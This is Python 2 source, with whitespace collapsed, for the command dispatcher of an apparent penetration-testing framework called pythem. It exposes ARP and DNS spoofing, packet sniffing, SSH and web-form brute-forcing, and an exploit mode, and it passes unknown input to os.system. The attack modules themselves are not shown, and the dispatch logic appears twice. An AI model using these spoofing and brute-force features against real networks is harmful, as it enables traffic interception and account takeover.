"xploit": try: from modules.exploit import Exploit if self.targets is not None and self.input_list[ 1] == "tcp": self.xploit = Exploit(self.targets, self.input_list[1]) self.xploit.start() elif self.file is not None and self.input_list[ 1] == "stdin": self.xploit = Exploit(self.file, self.input_list[1]) self.xploit.start() else: print "[!] You need to set or stdin or tcp as argument." print "[!] You need to set or a file or a target to xploit." except IndexError: try: print "[*] Select one xploit mode, options = stdin/tcp" mode = raw_input("[+] Exploit mode: ") if mode == "stdin" or mode == "tcp": from modules.exploit import Exploit if self.targets is not None: self.xploit = Exploit( self.targets, mode) self.xploit.start() elif self.file is not None: self.xploit = Exploit(self.file, mode) self.xploit.start() else: print "[!] You need to set or a file or a target to xploit." else: print "[!] Select a valid xploit mode, stdin or tcp" except KeyboardInterrupt: pass except TypeError: print "[!] You probably forgot to set the file" pass except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.command == "cookiedecode": try: cookiedecode() except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "decode": try: print decode(self.input_list[1]) except KeyboardInterrupt: pass elif self.input_list[0] == "encode": try: print encode(self.input_list[1]) except KeyboardInterrupt: pass elif self.input_list[0] == "geoip": try: self.targets = self.input_list[1] from modules.geoip import Geoip path = "config/GeoLiteCity.dat" iptracker = Geoip(self.targets, path) except IndexError: if self.targets is not None: from modules.geoip import Geoip path = "config/GeoLiteCity.dat" iptracker = Geoip(self.targets, path) else: print "[!] You probably forgot to set a target" except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "brute": if self.input_list[1] == "ssh": try: username = raw_input( "[+] Enter the username to bruteforce: ") from modules.ssh_bruter import SSHbrutus brutus = SSHbrutus(self.targets, username, self.file) brutus.start() except KeyboardInterrupt: brutus.stop() pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass elif self.input_list[1] == "url": try: url = 'url' from modules.web_bruter import WEBbrutus brutus = WEBbrutus(self.targets, self.file) brutus.start(url) except KeyboardInterrupt: brutus.stop(url) pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass elif self.input_list[1] == "form": try: form = 'form' from modules.web_bruter import WEBbrutus brutus = WEBbrutus(self.targets, self.file) brutus.start(form) except KeyboardInterrupt: brutus.stop(form) pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass else: print "[!] Select a valid type of brute-force type help to check." else: try: os.system("{}".format(self.command)) pass except Exception as e: print "[!] Select a valid option, type help to check syntax." pass except IndexError: pass except Exception as e: print "Exception caught: {}".format(e) except KeyboardInterrupt: print "\n[*] User requested shutdown." exit()
def start(self): try: while 1: self.command = raw_input("pythem> ") self.argv = self.command.split() self.input_list = [str(a) for a in self.argv] try: if self.command == "help": print_help(self.version) elif self.command == "jarvis-help": jarvis_help("0.0.5") elif self.command == "jarvis": self.Jarvis.start('core/') elif self.command == "exit" or self.command == "quit": exit() elif self.input_list[0] == "set" or self.input_list[ 0] == "SET": if self.input_list[1] == "interface": try: self.interface = raw_input( "[+] Enter the interface: ") except KeyboardInterrupt: pass elif self.input_list[1] == "gateway": try: self.gateway = raw_input( "[+] Enter the gateway: ") except KeyboardInterrupt: pass elif self.input_list[1] == "target": try: self.targets = raw_input( "[+] Enter the target(s): ") except KeyboardInterrupt: pass elif self.input_list[1] == "file": try: self.file = raw_input( "[+] Enter the path to the file: ") except KeyboardInterrupt: pass elif self.input_list[1] == "arpmode": try: self.arpmode = raw_input( "[+] Enter the arpmode:") except KeyboardInterrupt: pass elif self.command == "scan": print "[*] Select one scan mode, options = tcp/arp/manual" mode = raw_input("[+] Scan mode: ") if self.targets is not None and self.interface is not None: try: from modules.scanner import Scanner self.scan = Scanner(self.targets, self.interface, mode) self.scan.start() except KeyboardInterrupt: pass else: print "[!] You probably forgot to set the interface or a valid IP address/range" elif self.input_list[0] == "arpspoof": try: myip = get_myip(self.interface) mymac = get_mymac(self.interface) from modules.arpoisoner import ARPspoof self.spoof = ARPspoof(self.gateway, self.targets, self.interface, self.arpmode, myip, mymac) if self.input_list[1] == "start": self.spoof.start() print "[+] ARP spoofing initialized." elif self.input_list[1] == "stop": self.spoof.stop() print "[+] ARP spoofing finalized." else: print "[!] You probably forgot to type start or stop after arpspoof." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.input_list[0] == "dnsspoof": try: if self.input_list[1] == "start": domain = raw_input( "[+] Domain to be spoofed: ") redirect = raw_input( "[+] IP address to be redirected: ") from modules.dnspoisoner import DNSspoof self.dnsspoof = DNSspoof(domain, redirect) self.dnsspoof.start() print "[+] DNS spoofing initialized" elif self.input_list[1] == "stop": self.dnsspoof.stop() print "[+] DNS spoofing finalized" else: print "[!] You probably forgot to type start or stop after dnsspoof." except Exception as e: print "[!] Exception caught: {}".format(e) elif self.command == "sniff": filter = raw_input("[+] Enter the filter: ") try: from modules.sniffer import Sniffer self.sniff = Sniffer(self.interface, filter) self.sniff.start() except KeyboardInterrupt: pass elif self.command == "pforensic": try: from modules.pforensic import PcapReader self.pcapread = PcapReader(self.file) self.pcapread.start() except KeyboardInterrupt: pass except TypeError: print "[!] You probably forgot to set the .pcap file" pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.command == "cookiedecode": try: cookiedecode() except KeyboardInterrupt: pass except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "decode": try: print decode(self.input_list[1]) except KeyboardInterrupt: pass elif self.input_list[0] == "encode": try: print encode(self.input_list[1]) except KeyboardInterrupt: pass elif self.command == "geoip": if self.targets is not None: try: from modules.geoip import Geoip path = "config/GeoLiteCity.dat" iptracker = Geoip(self.targets, path) except Exception as e: print "[!] Exception caught: {}".format(e) pass elif self.input_list[0] == "brute-force": if self.input_list[1] == "ssh": try: username = raw_input( "[+] Enter the username to bruteforce: ") from modules.ssh_bruter import SSHbrutus brutus = SSHbrutus(self.targets, username, self.file) brutus.start() except KeyboardInterrupt: brutus.stop() pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass elif self.input_list[1] == "url": try: url = 'url' from modules.web_bruter import WEBbrutus brutus = WEBbrutus(self.targets, self.file) brutus.start(url) except KeyboardInterrupt: brutus.stop(url) pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass elif self.input_list[1] == "webform": try: form = 'form' from modules.web_bruter import WEBbrutus brutus = WEBbrutus(self.targets, self.file) brutus.start(form) except KeyboardInterrupt: brutus.stop(form) pass except TypeError: print "[!] You probably forgot to set the wordlist file path." pass else: print "[!] Select a valid type of brute-force type help to check." else: try: os.system("{}".format(self.command)) pass except Exception as e: print "[!] Select a valid option, type help to check sintax." pass except IndexError: pass except Exception as e: print "Exception caught: {}".format(e) except KeyboardInterrupt: print "\n[*] User requested shutdown." exit()